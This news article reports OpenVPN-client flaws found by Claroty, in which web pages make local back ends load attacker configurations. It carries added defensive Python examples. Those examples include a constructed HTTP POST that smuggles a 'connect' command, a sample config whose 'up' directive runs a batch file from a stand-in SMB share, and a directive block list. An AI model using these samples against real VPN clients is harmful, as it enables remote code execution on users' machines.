Severe Code Execution Vulnerabilities Affect OpenVPN-Based Applications

Security researchers at Claroty have raised the alarm for a series of severe code execution vulnerabilities affecting virtual private network (VPN) solutions relying on OpenVPN.


The company documented four security errors in products from HMS Industrial Networks, MB connect line, PerFact, and Siemens that allow attackers to achieve code execution by tricking potential victims into visiting a maliciously crafted web page.

VPN solutions are designed to provide users with means to encrypt the traffic flowing between their devices and a specific network, to ensure that potentially sensitive data is transmitted securely, and OpenVPN is the most common implementation of a VPN solution.

During its analysis of OpenVPN-based solutions, Claroty discovered that vendors usually deploy OpenVPN as a service with SYSTEM privileges, which poses security risks, because any remote or local applications can control an OpenVPN instance to initiate or terminate a secured connection.

Typically, a VPN client-server architecture involves the presence of a front end (a GUI application), a back end (which receives commands from the front-end), and OpenVPN (a service controlled by the back end and responsible for the VPN connection).

Because in most cases a cleartext protocol, without any form of authentication, is used over the dedicated socket channel through which the front end controls the back end, “anyone with access to the local TCP port the back end listens on, could potentially load an OpenVPN config and force the back end to spawn a new OpenVPN instance with this configuration,” Claroty explained.


An attacker looking to exploit this flaw would simply need to trick the victim into accessing a malicious website containing embedded JavaScript code designed to send a blind POST request to the local port, injecting commands into the VPN client's back end. This is a classic Server-Side Request Forgery (SSRF) case, the company said.

“Once the victim clicks the link, a HTTP POST request will be fired locally to the dedicated TCP port, and since HTTP is a cleartext based protocol which every line ends with \n, the back end server will read and ignore all the lines until reaching a meaningful command,” according to Claroty’s documentation.

Because the back end server will automatically parse and execute any valid commands it may receive, it could be instructed to load a remote configuration file containing specific commands leading to code execution or the installation of malicious payloads.
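The parsing weakness described above, and the fix a back end would need, can be shown with a small model. The following is an added example and not code from Claroty, OpenVPN or any of the affected vendors: a toy line-oriented command handler in the "skip what you don't understand" style the article describes, next to a hardened version that refuses anything shaped like an HTTP request, fails closed on unknown lines, and requires a per-session token that only the legitimate front end knows (the token value, the command names and the sample browser request are all constructed for the example).

```python
"""Toy VPN-client back-end command handler, modelled on the weakness the
article describes.  Constructed example: not vendor code, not OpenVPN code.

naive_handle()     reads line by line and ignores anything it does not
                   recognise, so a browser-originated HTTP POST hitting the
                   local port still yields a command once the headers are past.
hardened_handle()  rejects HTTP-shaped input outright, requires an AUTH line
                   carrying a per-session token the front end obtained out of
                   band, and aborts on any line it does not recognise.
"""
import hmac
import re
from typing import List, Tuple

KNOWN_COMMANDS = {"connect", "disconnect", "status"}  # constructed command set
HTTP_REQUEST_LINE = re.compile(r"^(GET|POST|PUT|DELETE|OPTIONS|HEAD) \S+ HTTP/\d\.\d$")
SESSION_TOKEN = "constructed-example-token"  # placeholder; a real back end issues one per session


def naive_handle(raw: bytes) -> List[Tuple[str, str]]:
    """Skip unrecognised lines, execute recognised ones (the article's description)."""
    executed = []
    for line in raw.decode("latin-1").split("\n"):
        line = line.strip("\r")
        if not line:
            continue
        verb, _, arg = line.partition(" ")
        if verb in KNOWN_COMMANDS:
            executed.append((verb, arg))
    return executed


def hardened_handle(raw: bytes) -> List[Tuple[str, str]]:
    """Return the commands to run, or [] if the message is not trusted."""
    lines = [l.rstrip("\r") for l in raw.decode("latin-1").split("\n")]
    # A browser request always starts with a request line; refuse it before parsing anything.
    if not lines or HTTP_REQUEST_LINE.match(lines[0]):
        return []
    verb, _, token = lines[0].partition(" ")
    # First line must authenticate the caller; constant-time compare avoids timing leaks.
    if verb != "AUTH" or not hmac.compare_digest(token, SESSION_TOKEN):
        return []
    executed = []
    for line in lines[1:]:
        if not line:
            continue
        head = line.partition(" ")[0]
        # Header-like ("Name: value") or request-like lines mean HTTP leaked in: abort.
        if HTTP_REQUEST_LINE.match(line) or head.endswith(":"):
            return []
        if head not in KNOWN_COMMANDS:
            return []  # fail closed instead of silently skipping
        executed.append((head, line.partition(" ")[2]))
    return executed


# Constructed sample of what a browser form POST to the local port looks like on
# the wire: request line, headers, blank line, then a body the page author chose.
BROWSER_POST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: 127.0.0.1:8080\r\n"
    b"Content-Type: text/plain\r\n"
    b"Content-Length: 31\r\n"
    b"\r\n"
    b"connect C:\\Temp\\untrusted.ovpn\n"
)
# Constructed sample of a legitimate front-end message.
LEGIT_FRONTEND = b"AUTH constructed-example-token\nstatus\n"

if __name__ == "__main__":
    print("naive   :", naive_handle(BROWSER_POST))      # the POST body becomes a command
    print("hardened:", hardened_handle(BROWSER_POST))   # []
    print("hardened:", hardened_handle(LEGIT_FRONTEND)) # [('status', '')]
```

The point of the hardened version is that authentication alone is not enough: a back end must also refuse to skip over input it does not understand, because the skipping behaviour is exactly what lets an HTTP envelope carry a command past the parser.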

“The attacker does not need to set up a dedicated OpenVPN server of their own because the up OpenVPN directive command is being executed before the connection to the OpenVPN server occurs,” Claroty said.

To achieve remote code execution, however, access to the attacker-controlled SMB server is needed, meaning that the attacker must either be on the same domain network as the target system, or the victim's computer must be configured to allow SMB access to external servers, the researchers note.
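Since the code execution in these cases comes from an OpenVPN configuration that the back end accepts without inspection, one practical mitigation is to vet a configuration before handing it to OpenVPN. The following is an added example, not code from Claroty or any vendor: a small validator that flags the OpenVPN directives which run external programs or load plugins (the directive names are taken from the OpenVPN manual; `up` is the one the article names) and any UNC path, which is how a remote SMB share would be referenced from a Windows client. The sample configurations are constructed.

```python
"""Vet an OpenVPN configuration before a back end passes it to OpenVPN.
Added example, not vendor or OpenVPN project code."""
import re
from typing import List

# Directives that make OpenVPN execute an external program or load code.
# Names are real OpenVPN directives (see the openvpn(8) manual page).
SCRIPT_DIRECTIVES = {
    "up", "down", "route-up", "route-pre-down", "ipchange", "tls-verify",
    "auth-user-pass-verify", "client-connect", "client-disconnect",
    "learn-address", "plugin", "script-security",
}
# Windows UNC path: \\host\share...  (a reference to a remote SMB server)
UNC_PATH = re.compile(r"\\\\[^\\\s\"']+\\")


def find_dangerous_directives(config_text: str) -> List[str]:
    """Return a human-readable finding per risky line; empty list means clean."""
    findings = []
    for lineno, raw in enumerate(config_text.splitlines(), 1):
        # OpenVPN treats '#' and ';' as comment starters.
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        directive = line.split()[0].lower()
        if directive in SCRIPT_DIRECTIVES:
            findings.append(f"line {lineno}: script-execution directive '{directive}'")
        if UNC_PATH.search(line):
            findings.append(f"line {lineno}: UNC path referenced (remote SMB share)")
    return findings


def is_safe_to_load(config_text: str) -> bool:
    return not find_dangerous_directives(config_text)


# Constructed sample: an ordinary client config with an inline CA block.
SAFE_CONFIG = """client
dev tun
proto udp
remote vpn.example.test 1194
<ca>
-----BEGIN CERTIFICATE-----
MIIB...constructed...
-----END CERTIFICATE-----
</ca>
"""

# Constructed sample: a config that would run a program from a remote share
# before any VPN connection is made.
UNSAFE_CONFIG = (
    "client\n"
    "remote vpn.example.test 1194\n"
    "script-security 2\n"
    'up "\\\\fileserver.example.test\\share\\hook.bat"\n'
)

if __name__ == "__main__":
    for name, cfg in (("safe", SAFE_CONFIG), ("unsafe", UNSAFE_CONFIG)):
        print(name, "->", find_dangerous_directives(cfg) or "clean")
```

A back end that applies a check like this still needs the authenticated control channel; the validator closes the path from "attacker-chosen config" to "attacker-chosen program", while the channel fix closes the path from "malicious web page" to "attacker-chosen config".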

A total of five CVE identifiers were issued based on Claroty’s research: CVE-2020-14498 (CVSS 9.6 – HMS Industrial Networks AB’s eCatcher), CVE-2021-27406 (CVSS 8.8 – PerFact’s OpenVPN-Client), CVE-2021-31338 (CVSS 7.8 – Siemens’ SINEMA RC Client), and CVE-2021-33526 and CVE-2021-33527 (CVSS 7.8 – MB connect line GmbH’s mbConnect Dialup).

Related: NSA, CISA Issue Guidance on Selecting and Securing VPNs

Related: Tens of Thousands of Unpatched Fortinet VPNs Hacked via Old Security Flaw

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
